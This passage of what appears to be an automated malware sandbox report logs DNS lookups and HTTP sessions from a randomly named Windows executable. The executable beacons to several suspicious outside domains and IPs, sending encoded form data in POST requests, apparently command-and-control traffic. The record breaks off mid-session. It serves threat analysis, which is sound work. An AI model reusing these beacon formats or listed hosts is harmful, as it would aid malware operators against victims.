Apr 1, 2025 09:03:52.856453896 CEST	192.168.2.4	1.1.1.1	0x2514	Standard query (0)	www.vipstargold.buzz	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:03:59.018047094 CEST	192.168.2.4	1.1.1.1	0x7155	Standard query (0)	www.woodsplace.net	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:04:13.358824968 CEST	192.168.2.4	1.1.1.1	0xcc34	Standard query (0)	www.sigaque.today	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:04:26.945852041 CEST	192.168.2.4	1.1.1.1	0xe6b8	Standard query (0)	www.kitculture.shop	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:04:27.948574066 CEST	192.168.2.4	1.1.1.1	0xe6b8	Standard query (0)	www.kitculture.shop	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:04:36.092961073 CEST	192.168.2.4	1.1.1.1	0x8e56	Standard query (0)	www.f66el619d.shop	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:04:37.089287043 CEST	192.168.2.4	1.1.1.1	0x8e56	Standard query (0)	www.f66el619d.shop	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:04:45.242784023 CEST	192.168.2.4	1.1.1.1	0x4b0b	Standard query (0)	www.alplace.site	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:04:53.407294035 CEST	192.168.2.4	1.1.1.1	0xe282	Standard query (0)	www.cruycq.info	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:05:08.374314070 CEST	192.168.2.4	1.1.1.1	0xc7a7	Standard query (0)	www.elevatetextiles.net	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:05:16.562122107 CEST	192.168.2.4	1.1.1.1	0xc924	Standard query (0)	www.qzsazi.info	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:05:31.671436071 CEST	192.168.2.4	1.1.1.1	0x25ab	Standard query (0)	www.l33900.xyz	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:05:45.436824083 CEST	192.168.2.4	1.1.1.1	0xb0b3	Standard query (0)	www.milp.store	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 1, 2025 09:03:18.225131035 CEST	1.1.1.1	192.168.2.4	0x89f7	No error (0)	www.031233226.xyz	031233226.xyz		CNAME (Canonical name)	IN (0x0001)	false
Apr 1, 2025 09:03:18.225131035 CEST	1.1.1.1	192.168.2.4	0x89f7	No error (0)	031233226.xyz		144.76.229.203	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:03:45.803064108 CEST	1.1.1.1	192.168.2.4	0xc690	No error (0)	www.031233226.xyz	031233226.xyz		CNAME (Canonical name)	IN (0x0001)	false
Apr 1, 2025 09:03:45.803064108 CEST	1.1.1.1	192.168.2.4	0xc690	No error (0)	031233226.xyz		144.76.229.203	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:03:51.849114895 CEST	1.1.1.1	192.168.2.4	0xb676	Server failure (2)	www.vipstargold.buzz	none	none	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:03:51.849191904 CEST	1.1.1.1	192.168.2.4	0xb676	Server failure (2)	www.vipstargold.buzz	none	none	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:03:52.957776070 CEST	1.1.1.1	192.168.2.4	0x2514	Server failure (2)	www.vipstargold.buzz	none	none	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:03:59.165592909 CEST	1.1.1.1	192.168.2.4	0x7155	No error (0)	www.woodsplace.net	woodsplace.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 1, 2025 09:03:59.165592909 CEST	1.1.1.1	192.168.2.4	0x7155	No error (0)	woodsplace.net		13.248.213.45	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:03:59.165592909 CEST	1.1.1.1	192.168.2.4	0x7155	No error (0)	woodsplace.net		76.223.67.189	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:04:13.486046076 CEST	1.1.1.1	192.168.2.4	0xcc34	No error (0)	www.sigaque.today		104.21.32.1	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:04:13.486046076 CEST	1.1.1.1	192.168.2.4	0xcc34	No error (0)	www.sigaque.today		104.21.64.1	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:04:13.486046076 CEST	1.1.1.1	192.168.2.4	0xcc34	No error (0)	www.sigaque.today		104.21.112.1	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:04:13.486046076 CEST	1.1.1.1	192.168.2.4	0xcc34	No error (0)	www.sigaque.today		104.21.80.1	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:04:13.486046076 CEST	1.1.1.1	192.168.2.4	0xcc34	No error (0)	www.sigaque.today		104.21.96.1	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:04:13.486046076 CEST	1.1.1.1	192.168.2.4	0xcc34	No error (0)	www.sigaque.today		104.21.16.1	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:04:13.486046076 CEST	1.1.1.1	192.168.2.4	0xcc34	No error (0)	www.sigaque.today		104.21.48.1	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:04:28.039468050 CEST	1.1.1.1	192.168.2.4	0xe6b8	Name error (3)	www.kitculture.shop	none	none	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:04:37.178788900 CEST	1.1.1.1	192.168.2.4	0x8e56	Name error (3)	www.f66el619d.shop	none	none	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:04:45.339003086 CEST	1.1.1.1	192.168.2.4	0x4b0b	Name error (3)	www.alplace.site	none	none	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:04:53.507210970 CEST	1.1.1.1	192.168.2.4	0xe282	No error (0)	www.cruycq.info		47.83.1.90	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:05:08.502291918 CEST	1.1.1.1	192.168.2.4	0xc7a7	Name error (3)	www.elevatetextiles.net	none	none	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:05:16.816375017 CEST	1.1.1.1	192.168.2.4	0xc924	No error (0)	www.qzsazi.info		47.83.1.90	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:05:31.922574997 CEST	1.1.1.1	192.168.2.4	0x25ab	No error (0)	www.l33900.xyz		162.218.30.235	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:05:45.624501944 CEST	1.1.1.1	192.168.2.4	0xb0b3	No error (0)	www.milp.store		194.9.94.85	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:05:45.624501944 CEST	1.1.1.1	192.168.2.4	0xb0b3	No error (0)	www.milp.store		194.9.94.86	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.031233226.xyz

www.woodsplace.net

www.sigaque.today

www.cruycq.info

www.qzsazi.info

www.l33900.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49723	144.76.229.203	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:03:18.423346996 CEST	460	OUT	GET /elns/?u8S0Yd=WgORCR1i1Oxy2N173PHNxeeoVlnRqt4wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8iCKArWTRjrJcin9XBz56FlEzKAwZua0RMSE=&rvNTa=V4hx68Jpk HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Connection: close Host: www.031233226.xyz User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Apr 1, 2025 09:03:18.600884914 CEST	479	IN	HTTP/1.1 404 Not Found Date: Tue, 01 Apr 2025 07:03:18 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49724	13.248.213.45	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:04:00.293005943 CEST	730	OUT	POST /cu04/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 203 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.woodsplace.net Origin: http://www.woodsplace.net Referer: http://www.woodsplace.net/cu04/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 75 38 53 30 59 64 3d 4c 67 61 76 67 59 69 67 39 4f 5a 2f 75 35 6e 4d 47 39 63 37 65 61 6d 2b 48 61 76 63 32 58 4e 31 4d 79 42 64 52 56 4b 54 51 74 77 57 49 35 6e 4f 55 65 6f 4c 6b 57 32 4b 72 48 61 69 33 75 6c 38 62 37 33 37 72 67 4b 76 38 57 76 50 4d 37 6e 30 34 74 76 69 73 43 43 76 44 75 34 6b 31 53 72 65 48 33 46 61 74 63 75 56 38 79 43 50 2b 6c 54 78 30 6a 56 77 66 6a 77 51 33 6f 52 30 68 47 64 42 57 38 79 46 78 33 7a 51 4f 72 5a 47 69 63 6d 67 43 65 36 35 50 47 7a 30 35 71 48 4d 56 33 6f 68 53 34 42 56 41 69 4a 75 34 43 71 59 46 6e 53 48 78 32 73 31 78 6a 47 69 4d 78 31 74 31 79 69 35 46 41 3d 3d Data Ascii: u8S0Yd=LgavgYig9OZ/u5nMG9c7eam+Havc2XN1MyBdRVKTQtwWI5nOUeoLkW2KrHai3ul8b737rgKv8WvPM7n04tvisCCvDu4k1SreH3FatcuV8yCP+lTx0jVwfjwQ3oR0hGdBW8yFx3zQOrZGicmgCe65PGz05qHMV3ohS4BVAiJu4CqYFnSHx2s1xjGiMx1t1yi5FA==
Apr 1, 2025 09:04:00.390646935 CEST	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49725	13.248.213.45	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:04:02.938894033 CEST	750	OUT	POST /cu04/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 223 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.woodsplace.net Origin: http://www.woodsplace.net Referer: http://www.woodsplace.net/cu04/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 75 38 53 30 59 64 3d 4c 67 61 76 67 59 69 67 39 4f 5a 2f 6f 59 58 4d 42 73 63 37 4a 71 6d 39 43 61 76 63 6a 6e 4e 78 4d 79 4e 64 52 55 4f 39 51 2b 55 57 49 59 58 4f 56 62 63 4c 6a 57 32 4b 6b 58 61 6e 7a 75 6c 33 62 37 72 64 72 69 75 76 38 57 4c 50 4d 37 58 30 6b 4f 33 74 74 53 43 74 59 2b 34 6d 78 53 72 65 48 33 46 61 74 59 47 37 38 79 61 50 2f 55 6a 78 6d 78 74 7a 42 7a 77 54 2b 49 52 30 79 57 64 46 57 38 7a 51 78 32 2f 32 4f 70 68 47 69 65 4f 67 48 62 4f 6d 45 47 7a 32 68 4b 47 44 45 58 68 77 56 72 67 49 44 78 74 33 2b 43 79 37 41 68 66 64 67 48 4e 69 6a 6a 69 52 52 32 38 5a 34 78 66 77 65 43 6a 61 64 34 4e 7a 39 76 52 75 68 43 72 49 47 65 57 49 61 47 55 3d Data Ascii: u8S0Yd=LgavgYig9OZ/oYXMBsc7Jqm9CavcjnNxMyNdRUO9Q+UWIYXOVbcLjW2KkXanzul3b7rdriuv8WLPM7X0kO3ttSCtY+4mxSreH3FatYG78yaP/UjxmxtzBzwT+IR0yWdFW8zQx2/2OphGieOgHbOmEGz2hKGDEXhwVrgIDxt3+Cy7AhfdgHNijjiRR28Z4xfweCjad4Nz9vRuhCrIGeWIaGU=
Apr 1, 2025 09:04:03.030935049 CEST	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49726	13.248.213.45	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:04:05.578892946 CEST	7007	OUT	POST /cu04/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 6479 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.woodsplace.net Origin: http://www.woodsplace.net Referer: http://www.woodsplace.net/cu04/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 75 38 53 30 59 64 3d 4c 67 61 76 67 59 69 67 39 4f 5a 2f 6f 59 58 4d 42 73 63 37 4a 71 6d 39 43 61 76 63 6a 6e 4e 78 4d 79 4e 64 52 55 4f 39 51 2b 63 57 49 4b 50 4f 55 38 41 4c 69 57 32 4b 6e 58 61 6d 7a 75 6c 71 62 37 7a 52 72 69 53 5a 38 6b 2f 50 4e 70 76 30 32 73 76 74 6b 43 43 74 65 2b 34 69 38 79 72 51 48 7a 59 54 74 63 75 37 38 78 65 50 2f 55 6a 78 30 7a 56 7a 66 7a 77 56 2b 49 52 6d 38 32 64 42 57 38 79 46 78 33 37 6d 4f 59 42 47 6e 4f 65 67 46 4a 57 6d 59 57 7a 77 69 4b 48 63 45 58 39 78 56 72 34 6d 44 77 6c 64 2b 79 53 37 42 6e 79 6b 78 57 52 35 37 42 2b 4e 45 78 4d 65 36 68 76 67 58 67 2f 31 58 4b 52 71 2f 4f 4a 69 6e 77 36 52 42 2f 47 55 44 42 55 30 6b 2b 4d 53 38 2b 42 58 55 46 4c 58 6f 31 42 65 56 6f 6d 37 7a 75 6e 73 30 77 38 44 2f 36 4c 6c 46 74 42 6f 4b 61 4b 6c 68 57 6f 47 76 43 55 53 57 51 6b 50 56 37 6e 61 6e 61 61 57 74 62 37 32 43 53 64 76 49 54 4c 55 32 44 73 62 6e 57 49 61 58 48 58 71 32 48 54 55 6b 63 4e 69 53 4c 71 63 47 48 6e 69 78 45 62 37 48 37 7a 44 54 70 30 4d 37 2f 59 [TRUNCATED] Data Ascii: u8S0Yd=LgavgYig9OZ/oYXMBsc7Jqm9CavcjnNxMyNdRUO9Q+cWIKPOU8ALiW2KnXamzulqb7zRriSZ8k/PNpv02svtkCCte+4i8yrQHzYTtcu78xeP/Ujx0zVzfzwV+IRm82dBW8yFx37mOYBGnOegFJWmYWzwiKHcEX9xVr4mDwld+yS7BnykxWR57B+NExMe6hvgXg/1XKRq/OJinw6RB/GUDBU0k+MS8+BXUFLXo1BeVom7zuns0w8D/6LlFtBoKaKlhWoGvCUSWQkPV7nanaaWtb72CSdvITLU2DsbnWIaXHXq2HTUkcNiSLqcGHnixEb7H7zDTp0M7/Yw7gJj7srhl0BIGW+1J1RSdyVb0jcNoA4/m3Ig4hDkD0QhTNmd2w9yNIIkOBsMQVUCongkhp9kiImmwzN60C9J7ywuOI5vkt0EHVhCwDchTKiQDOjoEDhNnwQdaTrXbR9K+3tGMZBn5BRF0LraRdhgij5/qUs27balhOSdorp/ErWp1zOj1Bi1R6Rjxvn2pkc0MeL6mKr8yJwpH8FLWTiWRmGq5NKS2Yv788LUFFc9/d9VI/iIT3WMjAXVkbg9eacFaLZpHAxAlemLj+J6oLLvDAd/tyLuYZ/YsIeXhrXU2EiH82mSSNc9Lmvvq9Xs7SBD3BZXSXU2QsKXoYmPYtZ0+Fm6usIuhq30wBX8bXZM7WiCShFtXlLspR7TtlZSRToZt9dpqnufj2iBbRfTyt7ybUKsel3nWl2FfjISeSvv+OYKnqECJAKaImz5poa5GEgigAMSBaUCBK2UasJ6+oD3sTJyb6B6HxTH/XrMrsXBeNUqgCIF1ncZQLLjEFdZfbVBPOW8G9mBLCvBjaBExq8p2wmt085Axjc0LQxiucVhzhaTVG2sqIUO6nyqsyLp0BBiFUVzBPdJzzGutcysUjvAU9F9Au4UI0Qs1uf2It4rBSDJFOuw/Gkvr9lt+IBLynRK1HVKvVQd+7nN5jYXbqsCWR+ZEy9uUrkAF [TRUNCATED]
Apr 1, 2025 09:04:05.678824902 CEST	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49727	13.248.213.45	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:04:08.217838049 CEST	461	OUT	GET /cu04/?rvNTa=V4hx68Jpk&u8S0Yd=GiyPjuDYqsZvqLKmYM4GHNurLKTkn1JaETEmSESCF/xTQ/G1etY80XKQ2GWRx+1dZZXHyyqD4Xe5NPq0++XCoh+pAJUHiAjRAUxXwPGw8BXU+Gmi1Qpjbxk= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Connection: close Host: www.woodsplace.net User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Apr 1, 2025 09:04:08.340334892 CEST	379	IN	HTTP/1.1 200 OK content-type: text/html date: Tue, 01 Apr 2025 07:04:08 GMT content-length: 258 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 72 76 4e 54 61 3d 56 34 68 78 36 38 4a 70 6b 26 75 38 53 30 59 64 3d 47 69 79 50 6a 75 44 59 71 73 5a 76 71 4c 4b 6d 59 4d 34 47 48 4e 75 72 4c 4b 54 6b 6e 31 4a 61 45 54 45 6d 53 45 53 43 46 2f 78 54 51 2f 47 31 65 74 59 38 30 58 4b 51 32 47 57 52 78 2b 31 64 5a 5a 58 48 79 79 71 44 34 58 65 35 4e 50 71 30 2b 2b 58 43 6f 68 2b 70 41 4a 55 48 69 41 6a 52 41 55 78 58 77 50 47 77 38 42 58 55 2b 47 6d 69 31 51 70 6a 62 78 6b 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?rvNTa=V4hx68Jpk&u8S0Yd=GiyPjuDYqsZvqLKmYM4GHNurLKTkn1JaETEmSESCF/xTQ/G1etY80XKQ2GWRx+1dZZXHyyqD4Xe5NPq0++XCoh+pAJUHiAjRAUxXwPGw8BXU+Gmi1Qpjbxk="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49728	104.21.32.1	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:04:13.597109079 CEST	727	OUT	POST /n61y/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 203 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.sigaque.today Origin: http://www.sigaque.today Referer: http://www.sigaque.today/n61y/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 75 38 53 30 59 64 3d 4d 4d 4e 2f 52 4e 35 57 46 46 6b 46 66 71 6f 61 70 75 6d 41 41 64 4b 6a 52 47 4f 48 75 4b 7a 52 61 53 63 77 36 31 36 58 46 7a 44 5a 49 6a 77 69 63 72 6e 52 43 64 62 6f 48 65 4f 61 6c 4a 56 61 36 35 34 34 58 43 4c 6d 72 58 66 33 44 38 4b 53 54 6a 2f 54 4b 4a 32 45 36 31 6f 4d 56 32 78 45 51 42 6c 43 35 39 6a 77 70 30 61 71 50 39 76 6d 42 52 69 5a 72 79 74 6a 2f 42 38 45 46 37 2f 73 2f 55 75 36 32 69 59 67 39 38 6a 41 72 79 69 31 67 69 62 63 48 2b 4c 54 43 6c 56 42 4f 44 65 46 46 64 47 59 78 37 39 58 33 50 58 73 74 46 41 7a 72 6b 51 63 53 6b 70 71 42 50 68 4d 50 6a 57 42 63 67 3d 3d Data Ascii: u8S0Yd=MMN/RN5WFFkFfqoapumAAdKjRGOHuKzRaScw616XFzDZIjwicrnRCdboHeOalJVa6544XCLmrXf3D8KSTj/TKJ2E61oMV2xEQBlC59jwp0aqP9vmBRiZrytj/B8EF7/s/Uu62iYg98jAryi1gibcH+LTClVBODeFFdGYx79X3PXstFAzrkQcSkpqBPhMPjWBcg==
Apr 1, 2025 09:04:13.975892067 CEST	1011	IN	HTTP/1.1 404 Not Found Date: Tue, 01 Apr 2025 07:04:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1giYocPV4iM8un99%2BjzPQNTksSicE47h7r6M%2Bbma8nXqEYvqPTc6zEF%2FJHLabd8TS8fJkwYUTproC48GzrN%2FbVJhrp334Lm1Evb%2BtkEcRNBhEl%2BbNbwTjKhWgz2wMMqdn0dwTg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92963b2d4a8842da-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=93653&min_rtt=93653&rtt_var=46826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=727&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+
Apr 1, 2025 09:04:13.975910902 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49729	104.21.32.1	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:04:16.238420963 CEST	747	OUT	POST /n61y/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 223 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.sigaque.today Origin: http://www.sigaque.today Referer: http://www.sigaque.today/n61y/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 75 38 53 30 59 64 3d 4d 4d 4e 2f 52 4e 35 57 46 46 6b 46 66 4b 34 61 6f 4e 4f 41 47 39 4b 67 53 47 4f 48 37 61 7a 56 61 53 51 77 36 30 2b 48 43 42 58 5a 50 44 41 69 64 71 6e 52 42 64 62 6f 50 2b 4f 62 72 70 56 64 36 35 6b 61 58 44 48 6d 72 58 4c 33 44 34 47 53 54 55 54 51 4c 5a 32 47 68 6c 6f 4f 49 6d 78 45 51 42 6c 43 35 39 66 61 70 30 43 71 50 4f 48 6d 42 30 57 47 31 43 74 6b 75 42 38 45 42 37 2f 6f 2f 55 75 59 32 67 74 4c 39 2b 72 41 72 32 75 31 67 7a 62 66 64 75 4c 4a 4d 46 55 6a 66 6a 69 4f 63 2b 6a 73 2f 6f 42 47 38 72 6e 67 73 44 4e 70 36 56 78 4c 41 6b 4e 5a 63 49 6f 34 43 67 72 49 48 71 4d 34 61 53 69 39 46 2f 2f 7a 4f 31 77 64 4e 76 52 73 57 6d 38 3d Data Ascii: u8S0Yd=MMN/RN5WFFkFfK4aoNOAG9KgSGOH7azVaSQw60+HCBXZPDAidqnRBdboP+ObrpVd65kaXDHmrXL3D4GSTUTQLZ2GhloOImxEQBlC59fap0CqPOHmB0WG1CtkuB8EB7/o/UuY2gtL9+rAr2u1gzbfduLJMFUjfjiOc+js/oBG8rngsDNp6VxLAkNZcIo4CgrIHqM4aSi9F//zO1wdNvRsWm8=
Apr 1, 2025 09:04:16.604953051 CEST	1009	IN	HTTP/1.1 404 Not Found Date: Tue, 01 Apr 2025 07:04:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o7ydtDJLN%2F8Tl4hlK3hVElUrHhf4x5JZ24Az1D%2F0frQHs3Htd6sazyOOA2QaUvO%2FX0Yn46HtzRWKutXBZuV8688doX4SGTppP0DFMXIoIq%2FyQ%2FaCN8HHwWSebU77P7GSw9CTqw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92963b3dcb48438e-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: 